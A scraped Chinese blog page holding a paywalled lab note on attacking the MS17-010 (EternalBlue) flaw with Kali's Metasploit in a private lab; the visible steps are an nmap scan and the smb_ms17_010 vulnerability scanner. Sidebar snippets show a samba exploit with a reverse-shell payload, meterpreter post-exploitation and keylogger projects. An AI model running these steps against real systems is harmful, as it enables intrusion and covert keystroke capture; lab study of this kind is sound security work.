linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录

最新推荐文章于 2023-04-04 21:30:39 发布
最新推荐文章于 2023-04-04 21:30:39 发布
阅读量826 收藏 5
点赞数
文章标签: linux 键盘记录

环境:        攻击机:192.168.200.101   //kali Linux 2020

靶机:192.168.200.103    (未打MS17-010补丁windowsServices2008.x64)

1:msfconsole                                                                         //进入metaploit

2:nmap -sV 192.168.200.103(检查445端口是否开放)        //使用nmap探测主机信息

3:利用msf的auxiliary模块进行漏洞验证

search ms17-010                                                                         //查询MS17-010永恒之蓝漏洞信息

use  auxiliary/scanner/smb/smb_ms17_010                                 //使用辅助扫描smb,是否存在永恒之蓝漏洞

set  rhost  192.168.200.103                                                         //设置目标IP

set  rport   445                                                                         //设置目标端口

run                                                                                                 //开始扫描

4:设置攻击目标、端口、本机

最低0.47元/天 解锁文章
苏瑞文
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全 基础之 Windows漏洞复现 (MS17-010)永恒之蓝
weixin_60888404的博客
06-01 2160
Windows经典漏洞 永恒之蓝复现
MS17-010 补丁
05-15
此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。 此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。 有关这些漏洞的详细信息,请参阅漏洞信息部分。 有关此更新的更多信息,请参阅 Microsoft 知识库文章 4013389。
网络安全与网站安全及计算机安全:如何防御计算机操作系统永恒之蓝勒索病毒?
Kali与编程
12-30 2081
防御ms17_101的方法: 1.安装杀毒软件 2.关闭445端口 3.打开计算机的防火墙功能 防御方式: 一、关闭文件共享 1.1首先我们接着永恒之蓝篇,测试是否能够连接目标电脑。 可以看到我们已经成功连接。 2.1接着我们打开控制面板->网络和 Internet->网络和共享中心->高级共享设置。关闭网络发现和文件共享,点击保存修改。 2.2我们再次打开kali再次使用永恒之蓝进行尝试。 2.3当我们关闭了共享服务时,就无法再次利用永恒之蓝对我们的计算机进行测试了。 二、打开防火
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)
m0_61506558的博客
09-01 4456
创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。meterpreter中输入:run post/windows/gather/enum_logged_on_users。...
Linux中怎么查看靶机文件里的内容,记一次lampiao靶机渗透
weixin_33049919的博客
05-07 649
最近笔者整理各类靶机,发现部分靶机没有记录,因此借此对lampiao靶机渗透思路进行一次总结,以此完善笔记。一、导入Lampiao靶机后选择NET模式开启kali也选择NET模式Kali的ip为 192.168.56.129扫描C段寻找靶机地址二、发现靶机ip为 192.168.56.130开启了22,80端口,访问80端口三、没有可利用的信息,通过NMAP扫描主机开放的所有端口四、访问189...
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
kali-linux-2023.3-vmware-amd64.part1.rar
最新发布
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
lolkey:作为 Linux 内核模块制作的简单键盘记录器。 适用于 linux 内核 3.16
07-01
lolkey - 简单的 linux 键盘记录器 作为 Linux 内核模块制作的简单键盘记录器。 在 Debian 7(sid) 上使用内核 3.16 进行测试 它是学术项目的一部分,以教育为目的。 要求 Linux 源代码和头文件 kbuild 用法 下载整个存储库 在主目录中输入make chmod +x ./load.sh然后输入./load.sh 或使用insmod lolkey.ko 要删除模块,您可以使用./unload.sh或键入rmmod lolkey 日志文件默认存放在/root/log.txt
基于内核的Linux键盘记录
07-03
本文分成两个部分。第一部分给出了Linux键盘驱动的工作原理,而后给出了键盘记录器的工作细节及其源代码。
Linux-keylogger:在Linux中配置键盘记录程序
05-11
键盘记录器 在Linux中配置键盘记录程序 在Linux机器上下载和配置keykogger的脚本 开始确认系统的电子邮件服务器: 要使用ssmtp配置电子邮件服务器,请运行smtpserver.sh脚本 授予执行权限: chmod + x smtpserver.sh 运行脚本: ./smtpserver.sh 按照脚本中的指示进行操作。 要使用postfix配置电子邮件服务器,请运行postfixserver.sh脚本 授予执行权限: chmod + x postfixserver.sh 运行脚本: ./postfixserver.sh 按照脚本中的指示进行操作。 开始执行keylogs.sh脚本。 授予执行权限: chmod + x keylogs.sh 运行脚本: ./keylogs.sh
CentOS7.8-MySQL-MHA高可用部署搭建
weixin_73705067的博客
04-04 756
目录Msyql MHA高可用MHA简介:MHA 优点:MHA 故障切换流程Manager工具:MHA搭建操作步骤:一、基础环境搭建1.1、将主机全部修改主机名&生成密钥1.2、man-manager修改host同步1.3、yum安装mysql 5.7版本1.44、优化MySQL(101、102、103都)1.5、将下文导入my.cnf(101、102、103都)1.6、mha-slave1二、开始配置主从复制2.1、mha-master2.2、mha-slave12.3、mha-slave22.4、mh
永恒之蓝 MS17-010漏洞复现
热门推荐
MX的博客
10-07 3万+
永恒之蓝 MS17-010漏洞复现 文章目录永恒之蓝 MS17-010漏洞复现一:漏洞原理1:简介2:漏洞原理代码详解二:漏洞复现1:信息收集 一:漏洞原理 1:简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。 注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无,S...
03.[445]samba-linux
有梦就别怕痛
09-20 580
msf > search samba msf > use exploit/multi/samba/usermap_script  msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse msf exploit(multi/samba/usermap_script) > set RHOST ...
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
记录linux服务器操作指令
qq_40062476的博客
03-19 157
记录linux服务器操作指令欢迎使用Markdown编辑器 欢迎使用Markdown编辑器 刚接触linux命令不久,领导要求把服务器每天有人操作指令记录下来然后上传到数据库,在网上查看了多人的写法。复制粘贴后也不好用,最后结合了一下别人方法加以修改就可以记录了。 centos7.3为例 编辑配置文件 # vi /etc/profile 将下面代码复制到配置文件中 // An highlighted block HISTORY_FILE=/root/test/testLog.txt PROMPT_COMM
Linux上基于 Golang 实现 KeyLogger 按键记录
Myth的博客
09-08 1398
项目主页 实现原理: 记录每次按键 键值和时间戳, 记录每天累计键输入次数 报表计算规则: 获取时间段内 Top 值的键值,得到需要展示的键值 获取时间段内每天 键值 输入次数 热力图 一周内每个小时的输入次数 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值